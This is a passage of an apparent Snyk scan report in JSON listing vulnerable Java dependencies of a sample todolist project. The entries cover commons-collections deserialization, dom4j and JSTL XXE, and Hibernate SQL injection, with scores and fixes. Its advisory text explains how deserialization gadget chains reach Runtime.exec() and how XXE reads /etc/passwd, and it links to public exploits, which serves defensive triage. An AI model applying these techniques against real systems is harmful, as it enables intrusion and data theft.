executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", - "epssDetails": { - "percentile": "0.99663", - "probability": "0.96725", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-4852" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2023-11-14T13:41:26.946764Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-11-06T16:51:56Z", - "exploitDetails": { - "sources": [ - "CISA", - "ExploitDB", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2015-11-06T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:26.834525Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "commons-collections:commons-collections@3.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "commons-collections:commons-collections", - "version": "3.1", - "severityWithCritical": "critical" - }, - { - "id": "SNYK-JAVA-DOM4J-174153", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", - "credit": [ - "Mario Areias" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0,]" - ], - "functionId": { - "filePath": "org/dom4j/Namespace.java", - "className": "Namespace", - "functionName": "" - } - }, - { - "version": [ - "[0,]" - ], - "functionId": { - "filePath": "org/dom4j/QName.java", - "className": "QName", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "dom4j:dom4j", - "references": [ - { - "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/dom4j/dom4j/issues/48", - "title": "GitHub Issue" - }, - { - "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", - "title": "POC: Ihacktoprotect Blog" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", - "cvssV3BaseScore": 6.1, - "modificationTime": "2024-03-11T09:46:26.800032Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:19.987177Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:53:54.900402Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:00:55.789489Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", - "assigner": "SUSE", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:26.800032Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:19.987177Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.900402Z" - } - ], - "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", - "epssDetails": { - "percentile": "0.70906", - "probability": "0.00325", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-1000632" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-6pcc-3rfx-4gpm" - ] - }, - "packageName": "dom4j:dom4j", - "proprietary": false, - "creationTime": "2019-04-10T16:07:04.634619Z", - "functions_new": [ - { - "version": [ - "[0,]" - ], - "functionId": { - "className": "org.dom4j.Namespace", - "functionName": "" - } - }, - { - "version": [ - "[0,]" - ], - "functionId": { - "className": "org.dom4j.QName", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-01T19:12:29Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "dom4j", - "artifactId": "dom4j" - }, - "publicationTime": "2018-08-21T14:16:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.900402Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "dom4j:dom4j", - "version": "1.6.1", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-DOM4J-2812975", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.4, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "dom4j:dom4j", - "references": [ - { - "url": "https://github.com/dom4j/dom4j/commit/a822852", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:50:18.813214Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:53:57.985080Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:31.083245Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.813214Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:57.985080Z" - } - ], - "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", - "epssDetails": { - "percentile": "0.79800", - "probability": "0.00664", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10683" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-hwj3-m3p6-hj38" - ] - }, - "packageName": "dom4j:dom4j", - "proprietary": false, - "creationTime": "2022-05-10T12:56:27.582369Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2020-04-15T09:38:17Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "dom4j", - "artifactId": "dom4j" - }, - "publicationTime": "2020-04-16T15:22:50Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.985080Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "dom4j:dom4j", - "version": "1.6.1", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-JAVAXSERVLET-30449", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "credit": [ - "David Jorm" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "javax.servlet:jstl", - "references": [ - { - "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E", - "title": "Apache Mail Archive" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254", - "title": "NVD" - }, - { - "url": "https://access.redhat.com/security/cve/CVE-2015-0254", - "title": "RedHat CVE Database" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:45:52.623697Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", - "cvssV3BaseScore": 7.6, - "modificationTime": "2024-03-11T09:53:48.017447Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:43.270072Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:45:52.623697Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.6, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:48.017447Z" - } - ], - "description": "## Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n", - "epssDetails": { - "percentile": "0.94002", - "probability": "0.07046", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-0254" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-6x4w-8w53-xrvv" - ] - }, - "packageName": "javax.servlet:jstl", - "proprietary": false, - "creationTime": "2017-02-22T07:28:19.341000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-02-27T16:13:27Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "javax.servlet", - "artifactId": "jstl" - }, - "publicationTime": "2015-02-27T16:51:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:48.017447Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "javax.servlet:jstl@1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "javax.servlet:jstl", - "version": "1.2", - "severityWithCritical": "high" - }, - { - "id": "snyk:lic:maven:javax.servlet:jstl:CDDL-1.0", - "type": "license", - "title": "CDDL-1.0 license", - "semver": { - "vulnerable": [ - "[1.2,)" - ] - }, - "license": "CDDL-1.0", - "language": "java", - "description": "CDDL-1.0 license", - "packageName": "javax.servlet:jstl", - "creationTime": "2024-06-18T08:06:13.191Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T08:06:13.191Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "javax.servlet:jstl@1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "javax.servlet:jstl", - "version": "1.2", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-1041788", - "title": "SQL Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,5.4.24.Final)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "5.4.24.Final" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.2, - "functions": [ - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", - "className": "SelectStatementBuilder", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Delete.java", - "className": "Delete", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Insert.java", - "className": "Insert", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/InsertSelect.java", - "className": "InsertSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/QuerySelect.java", - "className": "QuerySelect", - "functionName": "toQueryString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Select.java", - "className": "Select", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/SimpleSelect.java", - "className": "SimpleSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Update.java", - "className": "Update", - "functionName": "toStatementString" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-core", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", - "title": "GitHub Commit" - }, - { - "url": "https://access.redhat.com/security/cve/cve-2020-25638", - "title": "Redhat CVE Details" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:50:47.602540Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:53:47.086548Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.2, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:14.190706Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:47.602540Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.086548Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", - "epssDetails": { - "percentile": "0.72103", - "probability": "0.00352", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-25638" - ], - "CWE": [ - "CWE-89" - ] - }, - "packageName": "org.hibernate:hibernate-core", - "proprietary": false, - "creationTime": "2020-11-19T16:51:52.251545Z", - "functions_new": [ - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Delete", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Insert", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.InsertSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.QuerySelect", - "functionName": "toQueryString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Select", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.SimpleSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Update", - "functionName": "toStatementString" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-11-19T16:51:45Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-core" - }, - "publicationTime": "2020-11-19T16:57:14.572204Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.086548Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-584563", - "title": "SQL Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Gail Badner" - ], - "semver": { - "vulnerable": [ - "[,5.3.18.Final)", - "[5.4.0.Final, 5.4.18.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.3.18.Final", - "5.4.18.Final" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[5.1.18.Final ,5.4.18.Final)" - ], - "functionId": { - "filePath": "org/hibernate/query/criteria/internal/expression/LiteralExpression.java", - "className": "LiteralExpression", - "functionName": "renderProjection" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-core", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-orm/pull/3438", - "title": "GitHub Pull Request" - }, - { - "url": "https://hibernate.atlassian.net/browse/HHH-14077", - "title": "Jira Ticket" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:51:28.265729Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:49.262550Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:47.723462Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:28.265729Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:49.262550Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", - "epssDetails": { - "percentile": "0.42797", - "probability": "0.00104", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14900" - ], - "CWE": [ 